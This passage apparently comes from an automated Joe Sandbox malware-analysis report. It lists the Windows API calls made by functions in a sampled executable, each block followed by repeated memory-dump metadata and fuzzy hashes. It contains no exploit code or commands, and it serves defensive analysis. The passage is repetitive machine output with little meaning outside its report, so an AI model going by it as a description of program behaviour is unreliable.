                                                                                                                              • RegCloseKey.KERNEL32(00000000,?,?,0018C948,SwapMouseButtons,00000004,?,?,?,?,0018BF22), ref: 0018C9BC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                               • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                               • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                              • String ID: Control Panel\Mouse
                                                                                                                              • API String ID: 3677997916-824357125
                                                                                                                              • Opcode ID: 831fa9a95c81f03eb26c337557b816d50682733ab87c8e7804d629410aa831dc
                                                                                                                              • Instruction ID: df28e00ea4b3887a633be3c5007c0490c85e08cf2a6c69f9fba81053a814366a
                                                                                                                              • Opcode Fuzzy Hash: 831fa9a95c81f03eb26c337557b816d50682733ab87c8e7804d629410aa831dc
                                                                                                                              • Instruction Fuzzy Hash: FC112776A11218BEDB119FA4DC44EBE7BB8EF04748F1044AAF945E7210E731AE509BA0
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1be526b335f49d79fa7eddd56bb6e2615621b431e5afa85d7f025e2d7b0409b8
• Instruction ID: b61faf1cdc950f02c19fa25c654d5c019e57c90e187994b0613bbbe180fae8c6
• Opcode Fuzzy Hash: 1be526b335f49d79fa7eddd56bb6e2615621b431e5afa85d7f025e2d7b0409b8
• Instruction Fuzzy Hash: A1C18F79A00216EFCB14CF94C884EAEB7B5FF49704F508599E901EB251D730EE41CBA1
APIs
  • Part of subcall function 001741A7: _fseek.LIBCMT ref: 001741BF
  • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF49
  • Part of subcall function 001BCE59: _wcscmp.LIBCMT ref: 001BCF5C
• _free.LIBCMT ref: 001BCDC9
• _free.LIBCMT ref: 001BCDD0
• _free.LIBCMT ref: 001BCE3B
  • Part of subcall function 001928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928DE
  • Part of subcall function 001928CA: GetLastError.KERNEL32(00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928F0
• _free.LIBCMT ref: 001BCE43
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
• String ID:
• API String ID: 1552873950-0
• Opcode ID: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
• Instruction ID: 426506124d7bf7dc9ee27ee86edfd864891724f8422b396800b5b66c0ffb8b8d
• Opcode Fuzzy Hash: 66bc342b584f0e90e8e3921fe03708e5c63b2722386060f4a17f54ef5e71cd11
• Instruction Fuzzy Hash: 6D512BB1D04218AFDF15DFA4CC81AAEBBB9EF58340F1040AEF61DA3251D7715A808F69
APIs
• _memset.LIBCMT ref: 00171E87
  • Part of subcall function 001738E4: _memset.LIBCMT ref: 00173965
  • Part of subcall function 001738E4: _wcscpy.LIBCMT ref: 001739B5
  • Part of subcall function 001738E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001739C6
• KillTimer.USER32(?,00000001), ref: 00171EDC
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00171EEB
• Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 001E4526
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
• String ID:
• API String ID: 1378193009-0
• Opcode ID: d278e39ed9ddcc86a8f3efd58f86cf1320896fa5d3d5769800ccbacfdd5e74f0
• Instruction ID: fc1d5161b82a7d7a1e17b3b0978a223c872fd05f1014a1efc07c1403bbabce6a
• Opcode Fuzzy Hash: d278e39ed9ddcc86a8f3efd58f86cf1320896fa5d3d5769800ccbacfdd5e74f0
• Instruction Fuzzy Hash: 3121A7719047D4AFEB3787299855BEFBBEC9F05308F04408DE69E56241C7745A84CB51
APIs
  • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,001BAEA5,?,?,00000000,00000008), ref: 0018F282
  • Part of subcall function 0018F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,001BAEA5,?,?,00000000,00000008), ref: 0018F2A6
• gethostbyname.WS2_32(?), ref: 001C92F0
• WSAGetLastError.WS2_32(00000000), ref: 001C92FB
• _memmove.LIBCMT ref: 001C9328
• inet_ntoa.WS2_32(?), ref: 001C9333
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
• String ID:
• API String ID: 1504782959-0
• Opcode ID: 12c7fb827ac924f8fc3df2621caa08c8666c5a6768d90f4e85979e02dbe58579
• Instruction ID: 6932a7b93f6bf509a41ab4020b798b77837226d66854ae6304ad56a68dc829f6
• Opcode Fuzzy Hash: 12c7fb827ac924f8fc3df2621caa08c8666c5a6768d90f4e85979e02dbe58579
• Instruction Fuzzy Hash: BF115E75500109AFCB05FBA0DD56DEE77BAAF24314B108059F506A71A2DB30EE44CB51
APIs
  • Part of subcall function 001945EC: __FF_MSGBANNER.LIBCMT ref: 00194603
  • Part of subcall function 001945EC: __NMSG_WRITE.LIBCMT ref: 0019460A
  • Part of subcall function 001945EC: RtlAllocateHeap.NTDLL(013D0000,00000000,00000001), ref: 0019462F
• std::exception::exception.LIBCMT ref: 0019013E
• __CxxThrowException@8.LIBCMT ref: 00190153
  • Part of subcall function 00197495: RaiseException.KERNEL32(?,?,0017125D,00226598,?,?,?,00190158,0017125D,00226598,?,00000001), ref: 001974E6
Strings
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID: bad allocation
• API String ID: 3902256705-2104205924
• Opcode ID: a265028b257b64002229603ffeaf546f4df44d576a2477b37617dc861a7d5730
• Instruction ID: 7bb31dbf9fe7f056f7949f44f1cf116e79b25b103e81d2ba818cae918394b616
• Opcode Fuzzy Hash: a265028b257b64002229603ffeaf546f4df44d576a2477b37617dc861a7d5730
• Instruction Fuzzy Hash: 27F0C83910421DBBCF16ABE8ED029EE77EDBF18350F104425F905A21C1DBB0D69096A5
APIs
• MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0017C00E,?,?,?,?,00000010), ref: 0017C627
• MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0017C65F
• _memmove.LIBCMT ref: 0017C697
Memory Dump Source
• Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
• Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
Similarity
• API ID: ByteCharMultiWide$_memmove
• String ID:
• API String ID: 3033907384-0
• Opcode ID: 10faa98a1e5bab74255df5b530b659bb96dd0ae396224f0080d7894f33d3cc1e
• Instruction ID: 5e847c10d10af33e42e58475457c4720a8a974c0c6f0c8b74f01d20af9dfbbef
• Opcode Fuzzy Hash: 10faa98a1e5bab74255df5b530b659bb96dd0ae396224f0080d7894f33d3cc1e
• Instruction Fuzzy Hash: B531D9B26012016FDB249F74D846B2BB7E9EF58310F10853DF95E87290EB31E950C791
                                                                                                                              APIs
                                                                                                                              • SHGetMalloc.SHELL32(00173C31), ref: 00173A7D
                                                                                                                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00173AD2
                                                                                                                              • SHGetDesktopFolder.SHELL32(?), ref: 00173A8F
                                                                                                                                • Part of subcall function 00173B1E: _wcsncpy.LIBCMT ref: 00173B32
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3981382179-0
                                                                                                                              • Opcode ID: 1a7bcbfc74ea3cbcdd6615ba2f566d02642832a858514cf0e864a7fe665d67ed
                                                                                                                              • Instruction ID: 9855daa15f0e73cc224b4bcd16d9c77d566be3222f0c3db6350851e6cd4c0c60
                                                                                                                              • Opcode Fuzzy Hash: 1a7bcbfc74ea3cbcdd6615ba2f566d02642832a858514cf0e864a7fe665d67ed
                                                                                                                              • Instruction Fuzzy Hash: DD216F76B00118ABCB14DF95DC89DEEB7BEEF88710B1080A8F50AD7251DB309E46DB94
                                                                                                                              APIs
                                                                                                                              • __FF_MSGBANNER.LIBCMT ref: 00194603
                                                                                                                                • Part of subcall function 00198E52: __NMSG_WRITE.LIBCMT ref: 00198E79
                                                                                                                                • Part of subcall function 00198E52: __NMSG_WRITE.LIBCMT ref: 00198E83
                                                                                                                              • __NMSG_WRITE.LIBCMT ref: 0019460A
                                                                                                                                • Part of subcall function 00198EB2: GetModuleFileNameW.KERNEL32(00000000,00230312,00000104,?,00000001,00190127), ref: 00198F44
                                                                                                                                • Part of subcall function 00198EB2: ___crtMessageBoxW.LIBCMT ref: 00198FF2
                                                                                                                                • Part of subcall function 00191D65: ___crtCorExitProcess.LIBCMT ref: 00191D6B
                                                                                                                                • Part of subcall function 00191D65: ExitProcess.KERNEL32 ref: 00191D74
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              • RtlAllocateHeap.NTDLL(013D0000,00000000,00000001), ref: 0019462F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1372826849-0
                                                                                                                              • Opcode ID: db1054a2c66d6cc944f92c75c3bc1c5f1833530695532376719f6dd0aec342c9
                                                                                                                              • Instruction ID: 1f9cccc6a61774632ff0803fe1f90abae71cce3df6593a3b566e0a4bff96671f
                                                                                                                              • Opcode Fuzzy Hash: db1054a2c66d6cc944f92c75c3bc1c5f1833530695532376719f6dd0aec342c9
                                                                                                                              • Instruction Fuzzy Hash: 4B01B171601301ABEE243B65BC56F3A3348AF93B61F12052AF605DB5C2DFB0DC428674
                                                                                                                              APIs
                                                                                                                              • TranslateMessage.USER32(?), ref: 0017E646
                                                                                                                              • DispatchMessageW.USER32(?), ref: 0017E651
                                                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0017E664
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Message$DispatchPeekTranslate
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4217535847-0
                                                                                                                              • Opcode ID: f69543b473a8a7862ce08ea8c8c0a9be3d1510aee1d3e0202799ee8af34472e7
                                                                                                                              • Instruction ID: e446c242dbafaea819187fc960af640855c36fbc252021ed6eb0b18dfc838269
                                                                                                                              • Opcode Fuzzy Hash: f69543b473a8a7862ce08ea8c8c0a9be3d1510aee1d3e0202799ee8af34472e7
                                                                                                                              • Instruction Fuzzy Hash: 0FF01C726143459BEB10EBE18C45B7BB7EDBB98744F144C3DB645C3080EBB0D5058B22
                                                                                                                              APIs
                                                                                                                              • _free.LIBCMT ref: 001BC45E
                                                                                                                                • Part of subcall function 001928CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928DE
                                                                                                                                • Part of subcall function 001928CA: GetLastError.KERNEL32(00000000,?,00198715,00000000,001988A3,00194673,?), ref: 001928F0
                                                                                                                              • _free.LIBCMT ref: 001BC46F
                                                                                                                              • _free.LIBCMT ref: 001BC481
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 776569668-0
                                                                                                                              • Opcode ID: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                              • Instruction ID: a7c1300d2f0e738669cb1f527616691746077fa89fc5583666cec89b07c2ea5b
                                                                                                                              • Opcode Fuzzy Hash: 409dc5471866d52cb660d3acacbc6baa69eb1666097d1b0fc545827c793d8a90
                                                                                                                              • Instruction Fuzzy Hash: 56E017A1A00701B7CF24EE79A854BF363CC6F04761B14486EF459D7182DF28E94081B8
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: CALL
                                                                                                                              • API String ID: 0-4196123274
                                                                                                                              • Opcode ID: f37b25cc01e913222332a527b83b91c95495eb49d02d552fe1f9c4f1440c39c0
                                                                                                                              • Instruction ID: 32b1801e2a1e31eeaa9264112608833a4702e5064d52d32c92249a25476d29ab
                                                                                                                              • Opcode Fuzzy Hash: f37b25cc01e913222332a527b83b91c95495eb49d02d552fe1f9c4f1440c39c0
                                                                                                                              • Instruction Fuzzy Hash: 77229C70508344DFD769EF24C490A2AB7F1BF99304F25896DE89A8B261D731E989CF42
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001716F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00171751
                                                                                                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0017159B
                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00171612
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 001E58F7
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 458326420-0
                                                                                                                              • Opcode ID: 802945bf33e581ca3ae6d8451eaf29f81b0a18da0144b61118ed473ea1193be9
                                                                                                                              • Instruction ID: 55c47edacec63336cc8d90864c1486aa86a974b4ebc8211d6145eb908fa416d3
                                                                                                                              • Opcode Fuzzy Hash: 802945bf33e581ca3ae6d8451eaf29f81b0a18da0144b61118ed473ea1193be9
                                                                                                                              • Instruction Fuzzy Hash: 9071CDB4A113459FC314DFAAF99A894BBF9FB68344798816ED20A87372DB704474CF11
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _memmove
                                                                                                                              • String ID: EA06
                                                                                                                              • API String ID: 4104443479-3962188686
                                                                                                                              • Opcode ID: a396ab874808eb49e94dd7e8e8bb057adb28b8c1efffa0580f07db0fec9860df
                                                                                                                              • Instruction ID: 3c6365343e1080e3cb4fd6573d42ec2a3ce774e3b967383942fe60bb8c5d2d25
                                                                                                                              • Opcode Fuzzy Hash: a396ab874808eb49e94dd7e8e8bb057adb28b8c1efffa0580f07db0fec9860df
                                                                                                                              • Instruction Fuzzy Hash: FE418021A042589BDF15AB548C517FF7FB29B25300FA9C465F98EDB183C7219DD087A1
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: _wcscmp
                                                                                                                              • String ID: 0.0.0.0
                                                                                                                              • API String ID: 856254489-3771769585
                                                                                                                              • Opcode ID: 292f9f1d6e57a062b8d1b25de67373db96174985d30af16ebb4142cebe5226eb
                                                                                                                              • Instruction ID: 57643a27c2a7bdb2cdf06d06d4e8debe47fce4d8d4cfb029907e158230d6f229
                                                                                                                              • Opcode Fuzzy Hash: 292f9f1d6e57a062b8d1b25de67373db96174985d30af16ebb4142cebe5226eb
                                                                                                                              • Instruction Fuzzy Hash: 7911E335640204EFCB05EB54D981E99F3F9AFA8710B18805DF509AF392DB70ED818BA0
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001E3CF1
